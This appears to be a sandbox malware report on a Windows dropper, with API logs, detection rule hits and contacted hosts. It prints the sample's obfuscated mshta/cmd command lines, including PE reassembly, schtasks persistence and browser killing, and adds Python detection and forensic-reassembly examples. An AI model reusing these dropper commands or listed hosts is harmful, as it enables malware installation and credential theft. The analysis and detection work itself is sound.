_Hñ?$G4?ñ?È5È5ñ?¬À퉋,ñ?30]çX#ñ?&H§0ñ?ñ?€¾ûñ?ðþðþð?¢%³úíõð?œækõìð?`‚Uäð?–F¨ Ûð?:ž5VDÒð?;Ú¼OqÉð?qA‹†§Àð?ȝ%ìæ·ð?µì.r/¯ð?§h ¦ð?`ƒ¯¦Ûð?T 9?•ð?âeu³«Œð?„B!„ð?âê¸)Ÿ{ð?Æ÷G &sð?ûyœµjð?ü©ñÒMbð?†ur îYð?4×÷—Qð?ÅdÌIIð?AAð?üG‚·Æ8ð?^µ‘0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?€ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $šˆÞévMÞévMÞévMʂrLÕévMʂuLØévMʂsLGévMՆrLÐévMՆuL×évMՆsLýévMʂwLÝévMÞéwM¼évM†LßévM†‰MßévM†tLßévMRichÞévMPEd† Ì<að" ¶øTZ€`¬z(àà°Üð„X8ÐX0А.textŵ¶ `
request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc0024
1 1 0

InternetReadFile

request_handle: 0x00cc0048
1 1 0

InternetReadFile

request_handle: 0x00cc0024
1 1 0

InternetReadFile

request_handle: 0x00cc0048
1 1 0

InternetReadFile

request_handle: 0x00cc0018
1 1 0

InternetReadFile

request_handle: 0x00cc0030
1 1 0

InternetReadFile

request_handle: 0x00cc0024
1 1 0

InternetReadFile

request_handle: 0x00cc003c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTrustedCredManAccessPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process 6aosph8vk68scxmnfvq7uzqb.exe
process u7bmz_jch5qwyeh3mrgkn8v4.exe
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: 6a吐眭
process_identifier: 2644
0 0

url https://clients4.google.com/invalidation/android/request/
url http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url http://services.ukrposhta.com/postindex_new/
url http://dts.search-results.com/sr?lng=
url http://inposdom.gob.do/codigo-postal/
url http://creativecommons.org/ns
url http://www.postur.fo/
url https://qc.search.yahoo.com/search?ei=
url https://cacert.omniroot.com/baltimoreroot.crt09
url https://codereview.chromium.org/25305002).
url https://search.yahoo.com/search?ei=
url http://t1.symcb.com/ThawtePCA.crl0/
url http://crbug.com/31395.
url https://support.google.com/chrome/answer/165139
url https://ct.googleapis.com/aviator/
url https://datasaver.googleapis.com/v1/clientConfigs
url http://crl.starfieldtech.com/sfroot-g2.crl0L
url https://ct.startssl.com/
url https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url https://de.search.yahoo.com/favicon.ico
url https://github.com/GoogleChrome/Lighthouse/issues
url http://www.searchnu.com/favicon.ico
url https://support.google.com/installer/?product=
url http://msdn.microsoft.com/en-us/library/ms792901.aspx
url https://www.najdi.si/search.jsp?q=
url http://x.ss2.us/x.cer0
url http://crl.geotrust.com/crls/gtglobal.crl04
url https://accounts.google.com/ServiceLogin
url https://accounts.google.com/OAuthLogin
url https://c.android.clients.google.com/
url https://search.goo.ne.jp/sgt.jsp?MT=
url https://www.google.com/tools/feedback/chrome/__submit
url https://chrome.google.com/webstore/category/collection/dark_themes
url http://check.googlezip.net/generate_204
url http://ocsp.starfieldtech.com/08
url http://www.guernseypost.com/postcode_finder/
url http://crl.certum.pl/ca.crl0h
url http://ator
url https://suggest.yandex.by/suggest-ff.cgi?part=
url http://feed.snap.do/?q=
url https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url http://www.language
url https://support.google.com/chrome/
url http://developer.chrome.com/apps/declare_permissions.html
url https://ct.googleapis.com/rocketeer/
url https://www.globalsign.com/repository/03
url http://www.startssl.com/sfsca.crl0
url http://UA-Compatible
url https://se.search.yahoo.com/search?ei=
url http://EVSecure-ocsp.geotrust.com0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Take ScreenShot rule ScreenShot
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\adblocker
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000004c0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
2 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000004d8
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
base_handle: 0x80000001
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
2 0

RegOpenKeyExA

regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
base_handle: 0x80000002
key_handle: 0x00000000
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{829931FB-B163-40F9-8C58-F5603D324DE8}_is1
2 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000001
process_identifier: 2744
process_handle: 0x00000184
0 0

NtTerminateProcess

status_code: 0x00000001
process_identifier: 2744
process_handle: 0x00000184
1 0 0

NtTerminateProcess

status_code: 0xc0000005
process_identifier: 3104
process_handle: 0x0000000000000094
0 0

NtTerminateProcess

status_code: 0xc0000005
process_identifier: 3104
process_handle: 0x0000000000000094
1 0 0
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline taskkill /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline MSHTa.Exe vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
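The command lines above are the report's strongest host-side indicators, and their random casing and doubled quotes (`""` is how cmd nests a quote inside the quoted VBScript string) exist to defeat naive substring matching. The Python below is an added example, not code from the report or from the sample: it normalizes a command line and runs a small rule set over it covering what the page shows, that is mshta executing an inline `vbscript:` handler that instantiates WScript.Shell, the `echo | set /p = "MZ"` plus `copy /b` header-reassembly trick, control.exe handed a file path (which it loads as a Control Panel applet, i.e. a DLL), a `start` carrying a `-p<password>` WinRAR-SFX switch, a taskkill on the dropper's own `%~n` image name, schtasks at `/rl HIGHEST`, and killing the browser. The sample inputs are the page's own command lines; the rule names and the final benign Chrome line are mine.

```python
import re

# Command lines copied from the sandbox report (mixed case as logged).
# The last entry is a constructed benign Chrome child-process line used as a control.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )',
    r'"C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )',
    r'schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process /prefetch:2',
]

# Rule names are this example's own labels, not sandbox signature names.
RULES = {
    # mshta running an inline vbscript: URI that instantiates WScript.Shell (LOLBin chain)
    "mshta_vbscript_shell": r'\bmshta(?:\.exe)?\b.*\bvbscript\s*:.*wscript\.shell',
    # "echo | set /p = MZ > f & copy /b ...": rebuilding a PE header from non-PE fragments
    "pe_header_reassembly": r'\bset\s*/p\s*=\s*"?mz"?\s*>.*\bcopy\s+/b\b',
    # control.exe given a file path (contains a backslash) rather than an applet name
    "control_exe_file_arg": r'\bcontrol(?:\.exe)?\s+\S*\\\S+',
    # start <exe> -p<password>: password-protected WinRAR SFX stage
    "sfx_password_stage": r'\bstart\s+\S+\s+-p\S+',
    # taskkill on %~n...: the dropper kills its own original image name
    "taskkill_self_cleanup": r'\btaskkill\s+/f\s+[-/]im\s+"?%~n',
    # scheduled task created at the highest run level
    "schtasks_highest": r'\bschtasks\s+/create\b.*\s/rl\s+highest\b',
    # killing the browser before touching its profile databases
    "kill_browser": r'\btaskkill\s+/f\s+/im\s+(?:chrome|msedge|firefox|iexplore)\.exe\b',
}
COMPILED = {name: re.compile(pat, re.I | re.S) for name, pat in RULES.items()}


def normalize(cmdline):
    """Undo what defeats naive matching: cmd's doubled quotes inside a quoted
    string, irregular whitespace, and the random casing."""
    s = cmdline.replace('""', '"')
    s = re.sub(r'\s+', ' ', s)
    return s.lower().strip()


def scan(cmdline):
    """Return the sorted list of rule names that fire on one command line."""
    s = normalize(cmdline)
    return sorted(name for name, rx in COMPILED.items() if rx.search(s))


def triage(cmdlines):
    """Map each command line index to its findings, omitting clean lines."""
    hits = {}
    for i, c in enumerate(cmdlines):
        findings = scan(c)
        if findings:
            hits[i] = findings
    return hits


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_CMDLINES).items():
        print(idx, findings)
```

Matching is done on a lowercased, whitespace-collapsed copy so that `StARt`, `-Im` and `coPy` hit the same rule as their canonical spellings; the raw line is kept for reporting.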
host 186.2.171.3
host 194.145.227.159
host 2.56.59.42
host 37.0.8.119
host 45.133.1.107
host 45.133.1.182
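The `EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b ...` command above is the dropper rebuilding a PE on disk from fragments none of which begins with a PE header: the two DOS-magic bytes are recreated by cmd, six fragment files are appended to them binary-wise, control.exe loads the result (`..\QVNGp.I`), and `del /Q *` removes the parts. A responder holding the RarSFX1 directory contents (from the sandbox, or from an image taken before the delete) wants to rebuild the file in exactly that order and check it. The Python below is an added example, not code from the report: it parses the fragment order out of the `copy /b` command, rebuilds the file with case-insensitive name lookup (the echo writes `XAJ5SctM.IMN` and the copy reads `xAJ5sCtM.IMN`, which only works because NTFS ignores case), and validates the DOS and PE headers. The payload itself is not on the page, so the fragments are cut from a constructed stub image, and the first fragment is set to the bare bytes `MZ` that the echo/set /p step is meant to produce; if the recovered XAJ5SctM.IMN contains anything else (quotes, a space, a newline) the rebuilt file will not validate, and that file is the first thing to inspect.

```python
import re
import struct

# The cmd line from the report (the plain form, without the mshta wrapper).
DROPPER_CMD = r'Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *'

# Fragment names as they would exist on disk: the first one is spelled the way
# the echo redirection creates it, the rest as the copy command names them.
FRAGMENT_NAMES = ["XAJ5SctM.IMN", "E1N4OJ2.AUX", "KPeo.Pvp", "_OTV19C.~",
                  "EcF9W5.VNQ", "pM9uZ.pF", "KO6PQ1.bHw"]


def parse_copy_b(cmdline):
    """Extract (sources, destination) from a 'copy /b [/y] a + b + c dest'
    embedded in a longer cmd line. Names are returned as written."""
    m = re.search(r'\bcopy\s+((?:/[by]\s+)+)(.+?)\s+(\S+)\s*(?:&|$)', cmdline, re.I | re.S)
    if not m or 'b' not in m.group(1).lower():
        raise ValueError("no binary copy found")
    sources = [t.strip() for t in m.group(2).split('+') if t.strip()]
    return sources, m.group(3)


def reassemble(sources, files):
    """Concatenate fragments in copy /b order. Lookup is case-insensitive
    because the dropper relies on NTFS being so."""
    table = {name.lower(): data for name, data in files.items()}
    out = bytearray()
    for name in sources:
        if name.lower() not in table:
            raise FileNotFoundError(name)
        out += table[name.lower()]
    return bytes(out)


def pe_header_ok(blob):
    """Minimal PE sanity check: 'MZ', e_lfanew in range, 'PE\\0\\0' there,
    and a known Machine value (i386 or x64)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 6 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    return machine in (0x014C, 0x8664)


def build_stub_image():
    """Constructed stand-in for the real payload (not on the page): a 64-byte
    DOS header with e_lfanew -> 0x40, a PE signature, an i386 COFF header, filler."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x010F)
    return dos + b"PE\0\0" + coff + b"\xCC" * 200


def split_like_dropper(image, names):
    """Lay the image out the way the dropper does: the first 'fragment' is just
    the MZ magic that cmd recreates; the remaining bytes are spread over the
    other files so that no dropped file starts with a PE header."""
    body = image[2:]
    n = len(names) - 1
    step = -(-len(body) // n)  # ceiling division
    parts = [body[i * step:(i + 1) * step] for i in range(n)]
    files = {names[0]: image[:2]}
    files.update(zip(names[1:], parts))
    return files


def demo():
    """Rebuild from the parsed order and report (dest, bytes match,
    rebuilt validates as PE, any single fragment validates as PE)."""
    sources, dest = parse_copy_b(DROPPER_CMD)
    image = build_stub_image()
    files = split_like_dropper(image, FRAGMENT_NAMES)
    rebuilt = reassemble(sources, files)
    return dest, rebuilt == image, pe_header_ok(rebuilt), any(pe_header_ok(d) for d in files.values())


if __name__ == "__main__":
    print(demo())
```

Against real evidence, replace `split_like_dropper` with a read of the seven files from the recovered RarSFX1 directory and keep everything else; a rebuilt file that fails `pe_header_ok` almost always means the first two bytes are wrong.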
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 656
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000088
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x00000304
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 656
process_handle: 0x00000088
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
process mega.bmp useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process u7bmZ_Jch5QWYEh3mRgkn8v4.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
process xmi8r9WNNrVSGcFZGMShRqy0.exe useragent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
process Gul5rTCKpjXo0MogByz6Rjtk.tmp useragent InnoDownloadPlugin/1.5
Process injection Process 1908 called NtSetContextThread to modify thread in remote process 656
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780 (0x773b01c4)
registers.esp: 1638384 (0x0018fff0)
registers.edi: 0
registers.eax: 4199584 (0x004014a0)
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168 (0x7efde000)
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000084
process_identifier: 656
1 0 0
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3100 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef2f6f1e8,0x7fef2f6f1f8,0x7fef2f6f208
